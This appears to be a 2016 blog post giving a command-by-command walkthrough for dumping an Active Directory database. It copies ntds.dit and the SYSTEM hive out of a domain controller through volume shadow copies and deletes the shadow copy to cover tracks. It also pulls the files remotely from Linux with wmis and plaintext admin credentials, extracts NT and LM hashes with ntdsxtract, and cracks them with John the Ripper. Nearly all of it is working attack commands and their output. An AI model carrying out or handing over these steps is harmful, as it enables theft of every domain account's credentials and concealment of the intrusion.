........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
* C:\ vssadmin create shadow /for=C:
you should see:
Successly create shadow for 'C:\'
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
* C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get intall wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for ShadowsCopy that is where you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /mnt
ntds.dit SYSTEM
........................................
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
credump
# git clone https://github.com/moyix/creddump.git
ntdsextract
# get clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/ntds ~/ntds.dit
# ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhast.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment